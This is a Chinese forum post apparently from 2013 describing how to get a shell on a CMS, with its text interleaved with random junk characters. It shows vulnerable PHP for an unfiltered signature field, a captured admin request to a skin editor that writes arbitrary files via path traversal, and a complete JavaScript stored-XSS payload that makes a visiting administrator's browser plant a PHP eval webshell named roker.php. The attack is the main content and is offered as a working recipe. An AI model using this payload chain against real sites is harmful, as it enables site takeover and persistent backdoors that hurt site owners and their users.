|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题3 e. X) z C" E' F# P q' S
官网已经修补了,所以重新下了源码& ]$ l. S' P% X" C. r! u' g9 e$ Z
因为 后台登入 还需要认证码 所以 注入就没看了。* o: }; K. O( ?7 f# W- w
存在 xss0 [# Q9 t! k" }$ \9 S. {/ u
漏洞文件 user/member/skin_edit.php" i- }2 z# j! k- E i3 T2 S' o6 B4 N7 b
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
6 e* f6 ]7 M! J, }6 ]+ T1 N: o
/ ]/ F! v8 C2 F</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
: o7 D8 P# f# Q8 v( G
* B/ y# ~: A# Q2 F- r+ q</textarea></td></tr>$ }' L3 J8 j) U) T" j" Z
4 B7 C7 w& x' e/ `* [+ `1 \! z
user/do.php . s6 S' U9 a, z1 Z7 D- {
# i6 h% q! M- }9 C& k; J
1 i% B' t9 n( {& }if($op=='zl'){ //资料
+ E! N: ~6 p6 j+ m& p
4 c4 W& Z/ j) i8 n1 f. i! n if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
. u0 z/ i P& _7 Y E6 { exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));) l6 k" {! q: I8 [0 u$ v
+ M$ e( f. K& o* V
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
6 [$ e3 `5 ^! d$ i) g1 ~9 ?0 ~3 u
# X: m$ G- h+ L f4 q CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
8 U5 A' {; v: p where CS_Name='".$cscms_name."'";
/ ~0 \) {2 g- v+ f
& r: G' a4 i/ |) R if($db->query($sql)){
3 x6 G+ o8 e% M+ t8 L " H" D5 k; g% Y5 l
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); @4 x6 A/ W1 E' Q
/ m; O& y' D4 I, D }else{
5 \+ d7 V0 [$ E6 `6 B" E
0 }7 H, b: ], { exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
" }8 h5 X. E" e7 n3 H# `7 d- p3 N6 J
, r! ]! G# ]* R) O( _ ~5 Q }
0 N n. v8 E5 g& x; B& t
% l* n* H3 f0 u2 j. T. }; X2 `# c, Q4 M) ^( g! I
没有 过滤导致xss产生。" i* T7 w( o7 e9 S; K# E' m8 y2 y# p
后台 看了下 很奇葩的是可以写任意格式文件。。
/ I/ y. B: u7 D, e抓包。。" g; O) o+ m1 @1 P/ K
3 R! Z6 ?: ?, X8 z- s2 d* C7 u" e% v" u5 J, T/ K7 H9 r
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1' s) X% c* @0 S/ o9 u
( h3 e4 t- f% E# @3 ~+ bAccept: text/html, application/xhtml+xml, */*: W3 G- j+ r `5 Y0 x" g
/ N- d9 A' }0 J2 p \: W, x: R' g6 Q
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* T. j4 i+ k7 n. o5 a+ q: N/ G, z% J- ]
+ T: j* A6 @9 I- l' ^8 bAccept-Language: zh-CN
) \5 j0 @' A. Z8 U; |/ k" L- }
0 s2 H; q- Z' ~: [) \3 f) IUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
! ~: S; `& l: S5 @9 A9 [& O: L
5 l- b- ]! A* W+ G ZContent-Type: application/x-www-form-urlencoded
; ~# @1 f! Y( S4 N% V/ W# _
$ |6 S& q/ k3 |7 v LAccept-Encoding: gzip, deflate+ u( ^$ j) X2 r H/ f# r/ v
/ L# |% w$ s7 |2 lHost: 127.0.0.1
1 w8 C7 k. o+ m6 \9 k2 ]8 S: r
5 S' P+ f. {3 w9 ~& P8 uContent-Length: 388 @' ]/ t5 W) i
! t# n+ v. b+ _5 Q; _0 e4 U8 Z9 y
DNT: 1# {4 j3 x& Y! ?& H, _
( e% I: |* J8 ?% O
Connection: Keep-Alive9 \8 A6 Q8 U2 b% X
; q1 c4 D9 J. N( e& uCache-Control: no-cache
. w: F, Y' T' i; i ' q: Q" p) s O
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594. ~: `) Y' T2 G9 d: X `: Y
! @4 M3 J" Y7 G+ k0 m& j- y' K
% h: O! t) a# ^. V$ p) ?4 T/ hname=aaa.php&content=%3Cs%3E%3Ca%25%3E" ~2 M9 y; L2 d! w
* a0 @" P6 R, e! B, V; ]1 G- D$ ^7 a6 Q8 ]5 }. u
5 f* R+ _& L+ x
于是 构造js如下。
) v8 f" S/ m' Z
. O. @) Z T$ \本帖隐藏的内容<script>
; O) _: p; ?! a8 z \# K, xthisTHost = top.location.hostname;
+ U7 W0 k E/ l% V% D
; s7 M9 k. k& c6 w- J# n6 g' sthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
2 G+ M8 x% ?/ l
( d. ?( W) x( q! [/ S: Ffunction PostSubmit(url, data, msg) { " H; x, b" y" R5 r9 v: l3 e
var postUrl = url;4 V* f% R" E6 c' d( T& m8 W* V# k
/ [3 y# H& L* w4 |4 g/ Y8 L9 F
var postData = data;
1 [( N# H0 |; }% ]# @' K: Q, |) ? var msgData = msg;
( n$ X! w# E$ B0 R5 D+ Z var ExportForm = document.createElement("FORM"); " d* T% h2 y2 G `! r9 q, }
document.body.appendChild(ExportForm); N! `" n0 I% Z& G" i7 S' w7 o
ExportForm.method = "POST";
5 Q2 h$ z ~! `. }+ j/ H var newElement = document.createElement("input");
: H1 v( I' @* k4 y" w newElement.setAttribute("name", "name");
1 b" j( P: ^9 G newElement.setAttribute("type", "hidden"); 1 ~" [2 G9 t4 T6 e8 E
var newElement2 = document.createElement("input"); 5 t& k7 c. z& [+ ~) n8 f6 F
newElement2.setAttribute("name", "content");
* X. ^! Z3 p1 R/ [6 R' v newElement2.setAttribute("type", "hidden");
, k$ C) o% E! ]* v1 {' Y ExportForm.appendChild(newElement);
I4 e# {/ w; p% q ExportForm.appendChild(newElement2);
& S! e% v* O7 X- x) d1 r newElement.value = postData; 4 Z$ P, H5 D4 `
newElement2.value = msgData;
: d K" S1 X. J( y6 b ExportForm.action = postUrl;
5 B/ Y1 q; W, U2 r ExportForm.submit();
) O7 @* _/ n' `( y, e) q5 `};5 L/ x7 e( G% a4 Z( r) L
% |* G/ F& S: U3 g/ i h4 SPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");* L7 K5 j& L' s& D G/ l* V
' z. m6 @4 v, i. G' C0 ]/ d7 u</script>
8 W* ]& S& k. e9 T
9 c& i2 l/ K$ D# g2 v" ]' l x) a! R) K ?' \' l
; O, ?2 X, L( U6 O' M2 N/ s x5 ~http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
* W3 \$ W3 i' l% `% ]) G" m: ~用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)& C: u7 @5 }, y
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
0 B& i& A [' z+ K3 `7 M
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对